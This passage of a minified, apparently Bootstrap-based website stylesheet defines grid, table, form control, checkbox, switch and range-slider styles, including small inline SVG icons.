solid;border-color:inherit}label{display:inline-block}button{border-radius:0}button:focus:not(:focus-visible){outline:0}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}select:disabled{opacity:1}[list]::-webkit-calendar-picker-indicator{display:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]:not(:disabled),[type=reset]:not(:disabled),[type=submit]:not(:disabled),button:not(:disabled){cursor:pointer}::-moz-focus-inner{padding:0;border-style:none}textarea{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-size:calc(1.275rem + .3vw);line-height:inherit}@media (min-width:1200px){legend{font-size:1.5rem}}legend+*{clear:left}::-webkit-datetime-edit-day-field,::-webkit-datetime-edit-fields-wrapper,::-webkit-datetime-edit-hour-field,::-webkit-datetime-edit-minute,::-webkit-datetime-edit-month-field,::-webkit-datetime-edit-text,::-webkit-datetime-edit-year-field{padding:0}::-webkit-inner-spin-button{height:auto}[type=search]{outline-offset:-2px;-webkit-appearance:textfield}::-webkit-search-decoration{-webkit-appearance:none}::-webkit-color-swatch-wrapper{padding:0}::file-selector-button{font:inherit}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}output{display:inline-block}summary{display:list-item;cursor:pointer}progress{vertical-align:baseline}[hidden]{display:none!important}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:calc(1.625rem + 4.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-1{font-size:5rem}}.display-2{font-size:calc(1.575rem + 3.9vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-2{font-size:4.5rem}}.display-3{font-size:calc(1.525rem + 3.3vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-3{font-size:4rem}}.display-4{font-size:calc(1.475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-4{font-size:3.5rem}}.display-5{font-size:calc(1.425rem + 2.1vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-5{font-size:3rem}}.display-6{font-size:calc(1.375rem + 1.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-6{font-size:2.5rem}}.list-inline,.list-unstyled{padding-left:0;list-style:none}.list-inline-item{display:inline-block}.list-inline-item:not(:last-child){margin-right:.5rem}.initialism{font-size:.875em;text-transform:uppercase}.blockquote{margin-bottom:1rem;font-size:1.25rem}.blockquote>:last-child{margin-bottom:0}.blockquote-footer{margin-top:-1rem;margin-bottom:1rem;font-size:.875em;color:#666e76}.blockquote-footer:before{content:"— "}.img-fluid,.img-thumbnail{max-width:100%;height:auto}.img-thumbnail{padding:.25rem;background-color:#fff;border:1px solid #dee2e6;border-radius:.25rem}.figure{display:inline-block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:.875em;color:#666e76}.container,.container-fluid,.container-lg,.container-md,.container-sm,.container-xl,.container-xxl{width:100%;padding-right:var(--gutter-x,1rem);padding-left:var(--gutter-x,1rem);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@media (min-width:992px){.container,.container-lg,.container-md,.container-sm{max-width:960px}}@media (min-width:1200px){.container,.container-lg,.container-md,.container-sm,.container-xl{max-width:1140px}}@media (min-width:1400px){.container,.container-lg,.container-md,.container-sm,.container-xl,.container-xxl{max-width:1320px}}.row{--gutter-x:2rem;--gutter-y:0;display:flex;flex-wrap:wrap;margin-top:calc(var(--gutter-y)*-1);margin-right:calc(var(--gutter-x)*-0.5);margin-left:calc(var(--gutter-x)*-0.5)}.row>*{flex-shrink:0;width:100%;max-width:100%;padding-right:calc(var(--gutter-x)*0.5);padding-left:calc(var(--gutter-x)*0.5);margin-top:var(--gutter-y)}.col{flex:1 0 0%}.row-cols-auto>*{flex:0 0 auto;width:auto}.row-cols-1>*{flex:0 0 auto;width:100%}.row-cols-2>*{flex:0 0 auto;width:50%}.row-cols-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-4>*{flex:0 0 auto;width:25%}.row-cols-5>*{flex:0 0 auto;width:20%}.row-cols-6>*{flex:0 0 auto;width:16.6666666667%}@media (min-width:576px){.col-sm{flex:1 0 0%}.row-cols-sm-auto>*{flex:0 0 auto;width:auto}.row-cols-sm-1>*{flex:0 0 auto;width:100%}.row-cols-sm-2>*{flex:0 0 auto;width:50%}.row-cols-sm-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-sm-4>*{flex:0 0 auto;width:25%}.row-cols-sm-5>*{flex:0 0 auto;width:20%}.row-cols-sm-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:768px){.col-md{flex:1 0 0%}.row-cols-md-auto>*{flex:0 0 auto;width:auto}.row-cols-md-1>*{flex:0 0 auto;width:100%}.row-cols-md-2>*{flex:0 0 auto;width:50%}.row-cols-md-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-md-4>*{flex:0 0 auto;width:25%}.row-cols-md-5>*{flex:0 0 auto;width:20%}.row-cols-md-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:992px){.col-lg{flex:1 0 0%}.row-cols-lg-auto>*{flex:0 0 auto;width:auto}.row-cols-lg-1>*{flex:0 0 auto;width:100%}.row-cols-lg-2>*{flex:0 0 auto;width:50%}.row-cols-lg-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-lg-4>*{flex:0 0 auto;width:25%}.row-cols-lg-5>*{flex:0 0 auto;width:20%}.row-cols-lg-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:1200px){.col-xl{flex:1 0 0%}.row-cols-xl-auto>*{flex:0 0 auto;width:auto}.row-cols-xl-1>*{flex:0 0 auto;width:100%}.row-cols-xl-2>*{flex:0 0 auto;width:50%}.row-cols-xl-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-xl-4>*{flex:0 0 auto;width:25%}.row-cols-xl-5>*{flex:0 0 auto;width:20%}.row-cols-xl-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:1400px){.col-xxl{flex:1 0 0%}.row-cols-xxl-auto>*{flex:0 0 auto;width:auto}.row-cols-xxl-1>*{flex:0 0 auto;width:100%}.row-cols-xxl-2>*{flex:0 0 auto;width:50%}.row-cols-xxl-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-xxl-4>*{flex:0 0 auto;width:25%}.row-cols-xxl-5>*{flex:0 0 auto;width:20%}.row-cols-xxl-6>*{flex:0 0 auto;width:16.6666666667%}}.col-auto{flex:0 0 auto;width:auto}.col-1{flex:0 0 auto;width:8.33333333%}.col-2{flex:0 0 auto;width:16.66666667%}.col-3{flex:0 0 auto;width:25%}.col-4{flex:0 0 auto;width:33.33333333%}.col-5{flex:0 0 auto;width:41.66666667%}.col-6{flex:0 0 auto;width:50%}.col-7{flex:0 0 auto;width:58.33333333%}.col-8{flex:0 0 auto;width:66.66666667%}.col-9{flex:0 0 auto;width:75%}.col-10{flex:0 0 auto;width:83.33333333%}.col-11{flex:0 0 auto;width:91.66666667%}.col-12{flex:0 0 auto;width:100%}.offset-1{margin-left:8.33333333%}.offset-2{margin-left:16.66666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.33333333%}.offset-5{margin-left:41.66666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.33333333%}.offset-8{margin-left:66.66666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.33333333%}.offset-11{margin-left:91.66666667%}.g-0,.gx-0{--gutter-x:0}.g-0,.gy-0{--gutter-y:0}.g-1,.gx-1{--gutter-x:0.25rem}.g-1,.gy-1{--gutter-y:0.25rem}.g-2,.gx-2{--gutter-x:0.5rem}.g-2,.gy-2{--gutter-y:0.5rem}.g-3,.gx-3{--gutter-x:1rem}.g-3,.gy-3{--gutter-y:1rem}.g-4,.gx-4{--gutter-x:1.5rem}.g-4,.gy-4{--gutter-y:1.5rem}.g-5,.gx-5{--gutter-x:3rem}.g-5,.gy-5{--gutter-y:3rem}@media (min-width:576px){.col-sm-auto{flex:0 0 auto;width:auto}.col-sm-1{flex:0 0 auto;width:8.33333333%}.col-sm-2{flex:0 0 auto;width:16.66666667%}.col-sm-3{flex:0 0 auto;width:25%}.col-sm-4{flex:0 0 auto;width:33.33333333%}.col-sm-5{flex:0 0 auto;width:41.66666667%}.col-sm-6{flex:0 0 auto;width:50%}.col-sm-7{flex:0 0 auto;width:58.33333333%}.col-sm-8{flex:0 0 auto;width:66.66666667%}.col-sm-9{flex:0 0 auto;width:75%}.col-sm-10{flex:0 0 auto;width:83.33333333%}.col-sm-11{flex:0 0 auto;width:91.66666667%}.col-sm-12{flex:0 0 auto;width:100%}.offset-sm-0{margin-left:0}.offset-sm-1{margin-left:8.33333333%}.offset-sm-2{margin-left:16.66666667%}.offset-sm-3{margin-left:25%}.offset-sm-4{margin-left:33.33333333%}.offset-sm-5{margin-left:41.66666667%}.offset-sm-6{margin-left:50%}.offset-sm-7{margin-left:58.33333333%}.offset-sm-8{margin-left:66.66666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.33333333%}.offset-sm-11{margin-left:91.66666667%}.g-sm-0,.gx-sm-0{--gutter-x:0}.g-sm-0,.gy-sm-0{--gutter-y:0}.g-sm-1,.gx-sm-1{--gutter-x:0.25rem}.g-sm-1,.gy-sm-1{--gutter-y:0.25rem}.g-sm-2,.gx-sm-2{--gutter-x:0.5rem}.g-sm-2,.gy-sm-2{--gutter-y:0.5rem}.g-sm-3,.gx-sm-3{--gutter-x:1rem}.g-sm-3,.gy-sm-3{--gutter-y:1rem}.g-sm-4,.gx-sm-4{--gutter-x:1.5rem}.g-sm-4,.gy-sm-4{--gutter-y:1.5rem}.g-sm-5,.gx-sm-5{--gutter-x:3rem}.g-sm-5,.gy-sm-5{--gutter-y:3rem}}@media (min-width:768px){.col-md-auto{flex:0 0 auto;width:auto}.col-md-1{flex:0 0 auto;width:8.33333333%}.col-md-2{flex:0 0 auto;width:16.66666667%}.col-md-3{flex:0 0 auto;width:25%}.col-md-4{flex:0 0 auto;width:33.33333333%}.col-md-5{flex:0 0 auto;width:41.66666667%}.col-md-6{flex:0 0 auto;width:50%}.col-md-7{flex:0 0 auto;width:58.33333333%}.col-md-8{flex:0 0 auto;width:66.66666667%}.col-md-9{flex:0 0 auto;width:75%}.col-md-10{flex:0 0 auto;width:83.33333333%}.col-md-11{flex:0 0 auto;width:91.66666667%}.col-md-12{flex:0 0 auto;width:100%}.offset-md-0{margin-left:0}.offset-md-1{margin-left:8.33333333%}.offset-md-2{margin-left:16.66666667%}.offset-md-3{margin-left:25%}.offset-md-4{margin-left:33.33333333%}.offset-md-5{margin-left:41.66666667%}.offset-md-6{margin-left:50%}.offset-md-7{margin-left:58.33333333%}.offset-md-8{margin-left:66.66666667%}.offset-md-9{margin-left:75%}.offset-md-10{margin-left:83.33333333%}.offset-md-11{margin-left:91.66666667%}.g-md-0,.gx-md-0{--gutter-x:0}.g-md-0,.gy-md-0{--gutter-y:0}.g-md-1,.gx-md-1{--gutter-x:0.25rem}.g-md-1,.gy-md-1{--gutter-y:0.25rem}.g-md-2,.gx-md-2{--gutter-x:0.5rem}.g-md-2,.gy-md-2{--gutter-y:0.5rem}.g-md-3,.gx-md-3{--gutter-x:1rem}.g-md-3,.gy-md-3{--gutter-y:1rem}.g-md-4,.gx-md-4{--gutter-x:1.5rem}.g-md-4,.gy-md-4{--gutter-y:1.5rem}.g-md-5,.gx-md-5{--gutter-x:3rem}.g-md-5,.gy-md-5{--gutter-y:3rem}}@media (min-width:992px){.col-lg-auto{flex:0 0 auto;width:auto}.col-lg-1{flex:0 0 auto;width:8.33333333%}.col-lg-2{flex:0 0 auto;width:16.66666667%}.col-lg-3{flex:0 0 auto;width:25%}.col-lg-4{flex:0 0 auto;width:33.33333333%}.col-lg-5{flex:0 0 auto;width:41.66666667%}.col-lg-6{flex:0 0 auto;width:50%}.col-lg-7{flex:0 0 auto;width:58.33333333%}.col-lg-8{flex:0 0 auto;width:66.66666667%}.col-lg-9{flex:0 0 auto;width:75%}.col-lg-10{flex:0 0 auto;width:83.33333333%}.col-lg-11{flex:0 0 auto;width:91.66666667%}.col-lg-12{flex:0 0 auto;width:100%}.offset-lg-0{margin-left:0}.offset-lg-1{margin-left:8.33333333%}.offset-lg-2{margin-left:16.66666667%}.offset-lg-3{margin-left:25%}.offset-lg-4{margin-left:33.33333333%}.offset-lg-5{margin-left:41.66666667%}.offset-lg-6{margin-left:50%}.offset-lg-7{margin-left:58.33333333%}.offset-lg-8{margin-left:66.66666667%}.offset-lg-9{margin-left:75%}.offset-lg-10{margin-left:83.33333333%}.offset-lg-11{margin-left:91.66666667%}.g-lg-0,.gx-lg-0{--gutter-x:0}.g-lg-0,.gy-lg-0{--gutter-y:0}.g-lg-1,.gx-lg-1{--gutter-x:0.25rem}.g-lg-1,.gy-lg-1{--gutter-y:0.25rem}.g-lg-2,.gx-lg-2{--gutter-x:0.5rem}.g-lg-2,.gy-lg-2{--gutter-y:0.5rem}.g-lg-3,.gx-lg-3{--gutter-x:1rem}.g-lg-3,.gy-lg-3{--gutter-y:1rem}.g-lg-4,.gx-lg-4{--gutter-x:1.5rem}.g-lg-4,.gy-lg-4{--gutter-y:1.5rem}.g-lg-5,.gx-lg-5{--gutter-x:3rem}.g-lg-5,.gy-lg-5{--gutter-y:3rem}}@media (min-width:1200px){.col-xl-auto{flex:0 0 auto;width:auto}.col-xl-1{flex:0 0 auto;width:8.33333333%}.col-xl-2{flex:0 0 auto;width:16.66666667%}.col-xl-3{flex:0 0 auto;width:25%}.col-xl-4{flex:0 0 auto;width:33.33333333%}.col-xl-5{flex:0 0 auto;width:41.66666667%}.col-xl-6{flex:0 0 auto;width:50%}.col-xl-7{flex:0 0 auto;width:58.33333333%}.col-xl-8{flex:0 0 auto;width:66.66666667%}.col-xl-9{flex:0 0 auto;width:75%}.col-xl-10{flex:0 0 auto;width:83.33333333%}.col-xl-11{flex:0 0 auto;width:91.66666667%}.col-xl-12{flex:0 0 auto;width:100%}.offset-xl-0{margin-left:0}.offset-xl-1{margin-left:8.33333333%}.offset-xl-2{margin-left:16.66666667%}.offset-xl-3{margin-left:25%}.offset-xl-4{margin-left:33.33333333%}.offset-xl-5{margin-left:41.66666667%}.offset-xl-6{margin-left:50%}.offset-xl-7{margin-left:58.33333333%}.offset-xl-8{margin-left:66.66666667%}.offset-xl-9{margin-left:75%}.offset-xl-10{margin-left:83.33333333%}.offset-xl-11{margin-left:91.66666667%}.g-xl-0,.gx-xl-0{--gutter-x:0}.g-xl-0,.gy-xl-0{--gutter-y:0}.g-xl-1,.gx-xl-1{--gutter-x:0.25rem}.g-xl-1,.gy-xl-1{--gutter-y:0.25rem}.g-xl-2,.gx-xl-2{--gutter-x:0.5rem}.g-xl-2,.gy-xl-2{--gutter-y:0.5rem}.g-xl-3,.gx-xl-3{--gutter-x:1rem}.g-xl-3,.gy-xl-3{--gutter-y:1rem}.g-xl-4,.gx-xl-4{--gutter-x:1.5rem}.g-xl-4,.gy-xl-4{--gutter-y:1.5rem}.g-xl-5,.gx-xl-5{--gutter-x:3rem}.g-xl-5,.gy-xl-5{--gutter-y:3rem}}@media (min-width:1400px){.col-xxl-auto{flex:0 0 auto;width:auto}.col-xxl-1{flex:0 0 auto;width:8.33333333%}.col-xxl-2{flex:0 0 auto;width:16.66666667%}.col-xxl-3{flex:0 0 auto;width:25%}.col-xxl-4{flex:0 0 auto;width:33.33333333%}.col-xxl-5{flex:0 0 auto;width:41.66666667%}.col-xxl-6{flex:0 0 auto;width:50%}.col-xxl-7{flex:0 0 auto;width:58.33333333%}.col-xxl-8{flex:0 0 auto;width:66.66666667%}.col-xxl-9{flex:0 0 auto;width:75%}.col-xxl-10{flex:0 0 auto;width:83.33333333%}.col-xxl-11{flex:0 0 auto;width:91.66666667%}.col-xxl-12{flex:0 0 auto;width:100%}.offset-xxl-0{margin-left:0}.offset-xxl-1{margin-left:8.33333333%}.offset-xxl-2{margin-left:16.66666667%}.offset-xxl-3{margin-left:25%}.offset-xxl-4{margin-left:33.33333333%}.offset-xxl-5{margin-left:41.66666667%}.offset-xxl-6{margin-left:50%}.offset-xxl-7{margin-left:58.33333333%}.offset-xxl-8{margin-left:66.66666667%}.offset-xxl-9{margin-left:75%}.offset-xxl-10{margin-left:83.33333333%}.offset-xxl-11{margin-left:91.66666667%}.g-xxl-0,.gx-xxl-0{--gutter-x:0}.g-xxl-0,.gy-xxl-0{--gutter-y:0}.g-xxl-1,.gx-xxl-1{--gutter-x:0.25rem}.g-xxl-1,.gy-xxl-1{--gutter-y:0.25rem}.g-xxl-2,.gx-xxl-2{--gutter-x:0.5rem}.g-xxl-2,.gy-xxl-2{--gutter-y:0.5rem}.g-xxl-3,.gx-xxl-3{--gutter-x:1rem}.g-xxl-3,.gy-xxl-3{--gutter-y:1rem}.g-xxl-4,.gx-xxl-4{--gutter-x:1.5rem}.g-xxl-4,.gy-xxl-4{--gutter-y:1.5rem}.g-xxl-5,.gx-xxl-5{--gutter-x:3rem}.g-xxl-5,.gy-xxl-5{--gutter-y:3rem}}.table{--table-bg:var(--white);--table-accent-bg:transparent;--table-striped-color:var(--template-text-dark);--table-striped-bg:rgba(0,0,0,0.05);--table-active-color:var(--template-text-dark);--table-active-bg:rgba(0,0,0,0.1);--table-hover-color:var(--template-text-dark);--table-hover-bg:rgba(0,0,0,0.075);width:100%;margin-bottom:1rem;color:var(--template-text-dark);vertical-align:top;border-color:#dee2e6}.table>:not(caption)>*>*{padding:.75rem 1rem;background-color:var(--table-bg);border-bottom-width:1px;box-shadow:inset 0 0 0 9999px var(--table-accent-bg)}.table>tbody{vertical-align:inherit}.table>thead{vertical-align:bottom}.table>:not(:last-child)>:last-child>*{border-bottom-color:#dee2e6}.caption-top{caption-side:top}.table-sm>:not(caption)>*>*{padding:.3rem}.table-bordered>:not(caption)>*{border-width:1px 0}.table-bordered>:not(caption)>*>*{border-width:0 1px}.table-borderless>:not(caption)>*>*{border-bottom-width:0}.table-striped>tbody>tr:nth-of-type(odd){--table-accent-bg:var(--table-striped-bg);color:var(--table-striped-color)}.table-active{--table-accent-bg:var(--table-active-bg);color:var(--table-active-color)}.table-hover>tbody>tr:hover{--table-accent-bg:var(--table-hover-bg);color:var(--table-hover-color)}.table-primary{--table-bg:#d4e1f1;--table-striped-bg:#c9d6e5;--table-striped-color:#000;--table-active-bg:#bfcbd9;--table-active-color:#000;--table-hover-bg:#c4d0df;--table-hover-color:#000;color:#000;border-color:#bfcbd9}.table-secondary{--table-bg:#e0e2e4;--table-striped-bg:#d5d7d9;--table-striped-color:#000;--table-active-bg:#cacbcd;--table-active-color:#000;--table-hover-bg:#cfd1d3;--table-hover-color:#000;color:#000;border-color:#cacbcd}.table-success{--table-bg:#dae5dd;--table-striped-bg:#cfdad2;--table-striped-color:#000;--table-active-bg:#c4cec7;--table-active-color:#000;--table-hover-bg:#cad4cc;--table-hover-color:#000;color:#000;border-color:#c4cec7}.table-info{--table-bg:#d4e1f1;--table-striped-bg:#c9d6e5;--table-striped-color:#000;--table-active-bg:#bfcbd9;--table-active-color:#000;--table-hover-bg:#c4d0df;--table-hover-color:#000;color:#000;border-color:#bfcbd9}.table-warning{--table-bg:#fff0d0;--table-striped-bg:#f2e4c6;--table-striped-color:#000;--table-active-bg:#e6d8bb;--table-active-color:#000;--table-hover-bg:#ecdec0;--table-hover-color:#000;color:#000;border-color:#e6d8bb}.table-danger{--table-bg:#f3d4d4;--table-striped-bg:#e7c9c9;--table-striped-color:#000;--table-active-bg:#dbbfbf;--table-active-color:#000;--table-hover-bg:#e1c4c4;--table-hover-color:#000;color:#000;border-color:#dbbfbf}.table-light{--table-bg:#f8f9fa;--table-striped-bg:#ecedee;--table-striped-color:#000;--table-active-bg:#dfe0e1;--table-active-color:#000;--table-hover-bg:#e5e6e7;--table-hover-color:#000;color:#000;border-color:#dfe0e1}.table-dark{--table-bg:#212529;--table-striped-bg:#2c3034;--table-striped-color:#fff;--table-active-bg:#373b3e;--table-active-color:#fff;--table-hover-bg:#323539;--table-hover-color:#fff;color:#fff;border-color:#373b3e}.table-responsive{overflow-x:auto;-webkit-overflow-scrolling:touch}@media (max-width:575.98px){.table-responsive-sm{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:767.98px){.table-responsive-md{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:991.98px){.table-responsive-lg{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:1199.98px){.table-responsive-xl{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:1399.98px){.table-responsive-xxl{overflow-x:auto;-webkit-overflow-scrolling:touch}}.form-label{margin-bottom:.5rem}.col-form-label{margin-bottom:0;font-size:inherit;line-height:1.5}.col-form-label,.col-form-label-lg{padding-top:calc(.5rem + 1px);padding-bottom:calc(.5rem + 1px)}.col-form-label-lg{font-size:1.25rem}.col-form-label-sm{padding-top:calc(.25rem + 1px);padding-bottom:calc(.25rem + 1px);font-size:.8rem}.form-text{margin-top:.25rem;font-size:.875em;color:#666e76}.form-control{display:block;width:100%;padding:.5rem 1rem;font-size:1rem;font-weight:400;line-height:1.5;color:var(--template-text-dark);background-clip:padding-box;border:1px solid #cdcdcd;-webkit-appearance:none;-moz-appearance:none;appearance:none;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control{transition:none}}.form-control[type=file]{overflow:hidden}.form-control[type=file]:not(:disabled):not([readonly]){cursor:pointer}.form-control:focus{color:var(--template-text-dark);background-color:#fff;border-color:#95b4db;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.form-control::-webkit-date-and-time-value{height:1.5em}.form-control::-webkit-input-placeholder{color:#666e76;opacity:1}.form-control::-moz-placeholder{color:#666e76;opacity:1}.form-control:-ms-input-placeholder{color:#666e76;opacity:1}.form-control::-ms-input-placeholder{color:#666e76;opacity:1}.form-control::placeholder{color:#666e76;opacity:1}.form-control:disabled,.form-control[readonly]{background-color:#e8e8e8;opacity:1}.form-control::file-selector-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem;color:var(--white);background-color:#132f53;pointer-events:none;border:0 solid;border-color:inherit;border-inline-end-width:1px;border-radius:0;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control::file-selector-button{transition:none}}.form-control:hover:not(:disabled):not([readonly])::file-selector-button{background-color:#122d4f}.form-control::-webkit-file-upload-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem;color:var(--white);background-color:#132f53;pointer-events:none;border:0 solid;border-color:inherit;border-inline-end-width:1px;border-radius:0;-webkit-transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control::-webkit-file-upload-button{-webkit-transition:none;transition:none}}.form-control:hover:not(:disabled):not([readonly])::-webkit-file-upload-button{background-color:#122d4f}.form-control-plaintext{display:block;width:100%;padding:.5rem 0;margin-bottom:0;line-height:1.5;color:var(--template-text-dark);background-color:transparent;border:solid transparent;border-width:1px 0}.form-control-plaintext.form-control-lg,.form-control-plaintext.form-control-sm{padding-right:0;padding-left:0}.form-control-sm{min-height:calc(1.5em + .5rem + 2px);padding:.25rem .5rem;font-size:.8rem;border-radius:.2rem}.form-control-sm::file-selector-button{padding:.25rem .5rem;margin:-.25rem -.5rem;-webkit-margin-end:.5rem;margin-inline-end:.5rem}.form-control-sm::-webkit-file-upload-button{padding:.25rem .5rem;margin:-.25rem -.5rem;-webkit-margin-end:.5rem;margin-inline-end:.5rem}.form-control-lg{min-height:calc(1.5em + 1rem + 2px);padding:.5rem 1rem;font-size:1.25rem;border-radius:.3rem}.form-control-lg::file-selector-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem}.form-control-lg::-webkit-file-upload-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem}textarea.form-control{min-height:calc(1.5em + 1rem + 2px)}textarea.form-control-sm{min-height:calc(1.5em + .5rem + 2px)}textarea.form-control-lg{min-height:calc(1.5em + 1rem + 2px)}.form-control-color{max-width:3rem;height:auto;padding:.5rem}.form-control-color:not(:disabled):not([readonly]){cursor:pointer}.form-control-color::-moz-color-swatch{height:1.5em;border-radius:.25rem}.form-control-color::-webkit-color-swatch{height:1.5em;border-radius:.25rem}.custom-select,.form-select{display:block;width:100%;padding:.5rem 3rem .5rem 1rem;-moz-padding-start:calc(1rem - 3px);font-size:1rem;font-weight:400;line-height:1.5;color:var(--template-text-dark);background-image:url(../images/select-bg.svg);background-repeat:no-repeat;background-position:right 1rem center;background-size:116rem;border:1px solid #cdcdcd;border-radius:.25rem;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out;-webkit-appearance:none;-moz-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.custom-select,.form-select{transition:none}}.custom-select:focus,.form-select:focus{border-color:#95b4db;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.form-select[multiple],.form-select[size]:not([size="1"]),[multiple].custom-select,[size].custom-select:not([size="1"]){padding-right:1rem;background-image:none}.custom-select:disabled,.form-select:disabled{background-color:#e8e8e8}.custom-select:-moz-focusring,.form-select:-moz-focusring{color:transparent;text-shadow:0 0 0 var(--template-text-dark)}.form-select-sm{padding-top:.25rem;padding-bottom:.25rem;padding-left:.5rem;font-size:.8rem}.form-select-lg{padding-top:.5rem;padding-bottom:.5rem;padding-left:1rem;font-size:1.25rem}.form-check{display:block;min-height:1.5rem;padding-left:1.5em;margin-bottom:.125rem}.form-check .form-check-input{float:left;margin-left:-1.5em}.form-check-input{width:1em;height:1em;margin-top:.25em;vertical-align:top;background-color:#fff;background-repeat:no-repeat;background-position:50%;background-size:contain;border:1px solid rgba(0,0,0,.25);-webkit-appearance:none;-moz-appearance:none;appearance:none;-webkit-print-color-adjust:exact;color-adjust:exact}.form-check-input[type=checkbox]{border-radius:.25em}.form-check-input[type=radio]{border-radius:50%}.form-check-input:active{-webkit-filter:brightness(90%);filter:brightness(90%)}.form-check-input:focus{border-color:#95b4db;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.form-check-input:checked{background-color:#2a69b7;border-color:#2a69b7}.form-check-input:checked[type=checkbox]{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10l3 3 6-6'/%3E%3C/svg%3E")}.form-check-input:checked[type=radio]{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='2' fill='%23fff'/%3E%3C/svg%3E")}.form-check-input[type=checkbox]:indeterminate{background-color:#2a69b7;border-color:#2a69b7;background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10h8'/%3E%3C/svg%3E")}.form-check-input:disabled{pointer-events:none;-webkit-filter:none;filter:none;opacity:.5}.form-check-input:disabled~.form-check-label,.form-check-input[disabled]~.form-check-label{opacity:.5}.form-switch{padding-left:2.5em}.form-switch .form-check-input{width:2em;margin-left:-2.5em;background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='rgba(0, 0, 0, 0.25)'/%3E%3C/svg%3E");background-position:0;border-radius:2em;transition:background-position .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-switch .form-check-input{transition:none}}.form-switch .form-check-input:focus{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%2395b4db'/%3E%3C/svg%3E")}.form-switch .form-check-input:checked{background-position:100%;background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E")}.form-check-inline{display:inline-block;margin-right:1rem}.btn-check{position:absolute;clip:rect(0,0,0,0);pointer-events:none}.btn-check:disabled+.btn,.btn-check[disabled]+.btn{pointer-events:none;-webkit-filter:none;filter:none;opacity:.4}.form-range{width:100%;height:1.5rem;padding:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;appearance:none}.form-range:focus{outline:0}.form-range:focus::-webkit-slider-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .25rem rgba(42,105,183,.25)}.form-range:focus::-moz-range-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .25rem rgba(42,105,183,.25)}.form-range::-moz-focus-outer{border:0}.form-range::-webkit-slider-thumb{width:1rem;height:1rem;margin-top:-.25rem;background-color:#2a69b7;border:0;border-radius:1rem;-webkit-transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s 